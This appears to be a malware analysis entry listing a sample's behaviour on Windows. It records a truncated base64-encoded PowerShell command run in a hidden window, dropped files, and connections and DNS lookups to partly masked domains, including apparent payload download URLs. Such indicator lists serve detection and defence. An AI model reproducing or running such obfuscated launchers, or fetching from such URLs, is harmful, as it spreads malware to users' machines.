Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgACQASwBkAHoAaABBAD0AWwBUAHkAcABFAF0AKAAiAHsAMwB9AHsAMQB9AHsAMgB9AHsAMAB9ACIAIAAtAGYAIAAnAC4AZABpAFIAZQBDAFQATwByAFkAJwAsACcAbQAnACwAJwAuAGkATwAnACwAJwBzAHkAUwBUAEUAJw...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1380
- %TEMP%\1239443.cvr
- %HOMEPATH%\xs6bhac\rd2rs5b\x1tr5p.exe
- 'pa###icfe.com':80
- 'br#####toworkapp.com':80
- 'br#####toworkapp.com':443
- 'ru##rmi.com':80
- http://www.pa###icfe.com/shadow-health/nQ/
- http://br#####toworkapp.com/wp-content/c1/
- http://www.ru##rmi.com/wp-admin/jmb/
- 'br#####toworkapp.com':443
- DNS ASK se####ekifix.com
- DNS ASK pa###icfe.com
- DNS ASK br#####toworkapp.com
- DNS ASK ru##rmi.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgACQASwBkAHoAaABBAD0AWwBUAHkAcABFAF0AKAAiAHsAMwB9AHsAMQB9AHsAMgB9AHsAMAB9ACIAIAAtAGYAIAAnAC4AZABpAFIAZQBDAFQATwByAFkAJwAsACcAbQAnACwAJwAuAGkATwAnACwAJwBzAHkAUwBUAEUAJw...' (with hidden window)